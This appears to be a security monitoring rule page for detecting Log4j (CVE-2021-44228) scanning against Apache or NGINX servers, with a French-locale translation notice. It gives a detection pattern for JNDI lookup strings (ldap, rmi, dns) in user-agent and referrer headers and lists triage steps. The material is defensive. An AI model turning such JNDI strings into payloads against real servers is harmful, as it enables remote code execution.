Log4j Scanner detected in user agent or referrer
Cette page n'est pas encore disponible en français, sa traduction est en cours.
Si vous avez des questions ou des retours sur notre projet de traduction actuel,
n'hésitez pas à nous contacter.
Goal
This rule detects if your Apache or NGINX web servers are being scanned for the log4j vulnerability. The initial vulnerability was identified as CVE-2021-44228.
Strategy
This signal evaluated that jndi:(ldap OR rmi OR dns)
has been detected in the HTTP header fields user agent
and referrer
or referer
.
Triage and response
- Ensure you servers have the most recent version of log4j installed.
- Check if the
Base64 was detected in an http.user_agent or http.referrer
rule was also triggered and follow the Triage and response
steps in that rule.
Note: Datadog’s The Monitor
blog has an article published about “The Log4j Logshell vulnerability: Overview, detection, and remediation”.